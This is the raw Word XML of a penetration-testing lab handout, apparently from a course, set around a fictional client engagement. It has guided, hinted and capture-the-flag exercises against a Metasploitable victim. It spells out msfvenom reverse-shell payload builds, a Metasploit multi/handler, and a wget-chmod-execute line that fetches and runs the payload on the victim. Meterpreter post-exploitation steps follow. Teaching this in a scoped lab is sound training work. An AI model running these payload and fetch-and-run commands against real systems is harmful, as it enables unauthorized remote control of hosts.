        <w:t>• Catch a session with a multi/handler and interact via Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584614D8" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Escalate privilege, modify the file system, and upload and execute a script on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139A85AD" w14:textId="77777777" w:rsidR="00E656F4"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40"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E656F4" w14:paraId="5D4BB972" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE9E4"/>
          </w:tcPr>
          <w:p w14:paraId="2A070435" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>Case File — Cipher Logistics Engagement</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A392E3B" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">“Now the part the board remembers,” Nadia says. “Not ‘it could be exploited’ — an actual session on the box. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Build the payload yourself so you understand every option, catch the shell, and show what an attacker does once inside.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EAF8A7E" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>She is firm on scope. “The victim container (10.30.0.20), nothing else, ever. A shell you can't explain is worse than no shell.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F60BD52" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Your task: build and deliver a payload to the victim, obtain a Meterpreter session, escalate, and operate on the host within scope.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D162F45" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Lab Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17203047" w14:textId="77777777" w:rsidR="00E656F4"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48E8CED6" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
        </w:rPr>
        <w:t>6A — Guided Lab (follow along, then practice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653C6AE" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Work through these steps on the attacker; the commands are given. Read each “Expected” line to confirm you are on track, then complete the Practice task on your own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9BA01" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>1. Confirm the target is up and note its services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561AC6D" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nmap -sV 10.30.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F20B95F" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: exploitable services on the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5574614E" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>2. Build a Linux reverse-shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5C779" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.0.10 LPORT=4444 -f elf -o /root/shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A825A80" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: shell.elf written.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6CFC4" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>3. Host the payload for delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CED885D" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cd /root &amp;&amp; python3 -m http.server 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9542DB" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: an HTTP server serving shell.elf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C32BB0E" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>4. Start the handler (new terminal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313EC65A" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 10.10.0.10; set LPORT 4444; run'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C425C" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the handler listening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AB132" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>5. Deliver and run the payload on the victim, then catch the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C829D" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># on victim: wget http://10.10.0.10:8080/shell.elf -O /tmp/s; chmod +x /tmp/s; /tmp/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B8466" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: a Meterpreter session opening on the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92FBD8" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>6. Operate on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D47B0D" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52818155" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4B6B07" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>upload /root/task.sh /tmp/task.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6155BA84" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E14507" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: host details, your uid, and your script on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D21E6AC" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t xml:space="preserve">Practice: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>From the session, find and read one sensitive file within scope, and note how you would detect this activity as a defender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B391D" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6B — Unguided Lab (objectives + hints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EAE533" w14:textId="77777777" w:rsidR="00E656F4"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7F67C34B" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>1. Open the attacker and confirm the target with a quick scan of the victim (10.30.0.20).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC186B" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>2. Choose a suitable payload and build it with msfvenom (a Linux reverse shell for the Metasploitable victim), setting LHOST to the attacker (10.10.0.10).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D01AA99" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>3. Host the payload (Metasploit's web server, or a simple HTTP server) so the target can retrieve it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FA6E5F" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>4. Start a multi/handler in msfconsole matching your payload, then trigger/deliver the payload to open a session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29691498" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>5. In the session, enumerate the host, escalate privilege where possible, and read the current user/ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F47DC24" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>6. Modify the file system within scope: upload a small bash script and execute it, then confirm its output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D53183" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>7. If you recover any password hashes, crack them with John (your own authorized target only).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E656F4" w14:paraId="33CB3C09" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEE7F1"/>
          </w:tcPr>
          <w:p w14:paraId="07D93FAA" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>Hints (not full answers)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346C24C4" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.0.10 LPORT=4444 -f elf -o shell.elf. Host it with python3 -m http.server. Catch it: use exploit/multi/handler, set PAYLOAD to match, set LHOST/LPORT, run. In Meterpreter: sysinfo, getuid, upload, shell. On Metasploitable, a direct service exploit (e.g. vsftpd) is an alternative route to the same session.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16CAEE07" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
        </w:rPr>
        <w:t>6C — Capture the Flag (no instructions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A4456" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Prove impact on the victim — and only the victim. Get a session and answer the flags.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3180"/>
        <w:gridCol w:w="3180"/>
        <w:gridCol w:w="3180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E656F4" w14:paraId="1409938F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="44BC36C9" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="038EA8EC" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="12F31F6F" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Capture this</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="40C9A53C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E6E8B32" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01DEEA7D" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FD67169" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The payload type you used to get a session.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="5E632DC0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12D4C258" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073071C1" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6888AD09" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The uid/username your session runs as (and after any escalation).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="5AAA323C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DDF05C7" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FED73C5" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="237F0331" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The output of a script you uploaded and executed on the target.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E5613EB" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Total: 50 points. Submit each flag's value with one screenshot showing how you captured it. Any tool or method is allowed — but every target stays inside the 10.30.0.0/24 range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5746FC54" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00E656F4">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594B1A2D" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31380D43" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Metasploit collapses the gap between ‘vulnerable’ and ‘compromised,’ which is exactly why scope discipline is the first skill. Building the payload by hand teaches what each option does; the session is the artifact the board can't wave away. Its legitimacy rests entirely on ‘only the host we were authorized to test.’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E617FCE" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7. Deliverable: Screenshots &amp; Brief Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D70F215" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Submit the following as a single PDF or document, in order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4103C6DA" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of your msfvenom payload build (showing payload, LHOST, format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F06E04" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
